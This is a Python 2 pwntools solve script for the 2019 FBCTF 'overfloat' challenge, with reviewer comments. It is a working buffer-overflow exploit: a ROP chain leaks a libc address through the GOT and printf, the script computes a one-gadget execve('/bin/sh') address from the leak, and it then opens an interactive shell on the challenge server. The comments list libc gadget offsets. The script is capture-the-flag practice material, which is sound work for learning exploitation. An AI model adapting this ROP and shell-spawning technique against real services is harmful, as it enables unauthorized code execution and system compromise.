#!/usr/bin/python
# CTF solve script (pwntools) for a 2019 FBCTF challenge. Python 2 syntax
# throughout (print statements, integer `/`); it will not run unmodified
# under Python 3.
import pwn
import binascii  # NOTE(review): not used anywhere in the visible script
import subprocess
# 9DD00 is strncmp in libc
# 4F440 is system in libc
# 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rcx == NULL
# 0x4f322 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a38c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
# Despite the name this is NOT the offset of system (listed above as
# 4F440); it is 0x21ab0 minus the 0x4f2c5 address from the comments, so the
# constant is negative and is later *subtracted* from the leaked value
# (see `off = ...` below). 0x21ab0 is not explained on the page —
# presumably the libc offset of the symbol whose GOT entry gets printed;
# confirm against the target's libc before reusing.
SYSTEM_OFFSET = 0x21ab0 - 0x4f2c5
def phex(x):
    """Run the local helper binary ``./goback`` on ``x`` formatted as hex.

    ``x`` is rendered with ``"%x"`` (no ``0x`` prefix) and passed as the
    single argument; the first line of the helper's stdout is returned with
    trailing whitespace stripped. What ``./goback`` computes is not visible
    on this page — presumably it converts the value into the form the
    challenge expects (an "overfloat" input); confirm against the helper.

    The child is waited on before returning, so no zombie is left behind.
    """
    helper = subprocess.Popen(["./goback", "%x" % x], stdout=subprocess.PIPE)
    first_line = helper.stdout.readline()
    helper.wait()
    return first_line.rstrip()
# Connection to the 2019 challenge server (long since offline). The
# commented alternative runs the binary locally and pauses so a debugger
# can be attached to the printed pid.
p = pwn.remote("challenges.fbctf.com",1341)
# p = pwn.process("./overfloat")
# print "ATTACH NOW! (pid %d)" % p.pid
# raw_input()
p.recv()  # drain the banner; return value intentionally discarded
def sendline(l):
    """Print whatever the remote has queued, then send ``l`` plus a newline.

    Uses the module-level connection ``p``. The short-timeout recv() is a
    drain-and-echo for debugging; it must precede the send so the echoed
    output lines up with what was just written. With ``timeout=0.1`` an
    empty string is printed when nothing is pending.
    """
    global p
    print p.recv(timeout=0.1)
    p.send(l + "\n")
# ---- stage 1: obtain a libc address from the target ---------------------
print "stage 1 rop go"
p.recv(timeout=0.5)
# Eleven value pairs are sent, each passed through ./goback via phex().
# Slots 0-6 are filler; slots 7-10 carry the addresses annotated inline.
# NOTE(review): the fixed 0x400xxx / 0x602050 addresses imply a non-PIE
# build of the target; the page does not state its RELRO/PIE settings.
for i in range(0,11):
    if i == 7:
        sendline(phex(0x400a83)) # pop edi
        sendline(phex(0x0))
    elif i == 8:
        # sendline(phex(0x400abb))
        sendline(phex(0x602050)) # (edi = .got)
        # sendline(phex(0x6020a8)) # (edi = .got)
        sendline(phex(0x0))
    elif i == 9: # return to puts
        # sendline(phex(0x4006c0)) # PUTS
        sendline(phex(0x400690)) # PRINTF
        sendline(phex(0x0))
    elif i == 10: # reset
        sendline(phex(0x400749)) # actual reset for remote target. holy balls...
        sendline(phex(0x0))
    else:
        sendline(phex(0x72ff1100 + i))
        sendline(phex(0x44114400 + i))
print "stage 1 rop catch"
data = p.recv()
sendline("done")
data = p.recv(timeout=0.5)
# print data[0:8]
# Each recv() overwrites `data`; only the last chunk is parsed below, so
# the split of the reply across reads depends on timing (timeout-driven,
# hence racy on a slow link).
data = p.recv(timeout=0.5)
print "********************"
# The chunk is expected to begin with "BON VOYAGE!" followed one byte later
# by a 6-byte little-endian address; two NUL bytes pad it to the 8 bytes
# that struct format "L" (native unsigned long, 8 bytes on LP64) requires.
# A shorter reply makes struct.unpack raise struct.error.
l = len("BON VOYAGE!")
offset = data[l+1:l+7] + "\x00\x00"
print len(offset)  # debug: should be 8
import struct  # mid-script import; works, but conventionally belongs at the top
# SYSTEM_OFFSET is negative, so this adds the gadget distance to the leak.
off = struct.unpack("L",offset)[0] - SYSTEM_OFFSET
print hex(off)
# p.interactive()
# Split the 64-bit value into its high and low 32-bit halves. Python 2 `/`
# on ints is floor division; under Python 3 this line would yield a float
# and the "%x" format below would fail.
ph_part1 = (off & 0xFFFFFFFF00000000) / 0x100000000
ph_part2 = off & 0xFFFFFFFF
print "HEXP1 = %x" % ph_part1
print "HEXP2 = %x" % ph_part2
# spray and pray...
# ---- stage 2: send the computed value (low half, then high half) into
# all eleven slots, then hand the connection to the user ----------------
for i in range(0,11):
    sendline(phex(ph_part2))
    sendline(phex(ph_part1))
sendline("done")
p.interactive()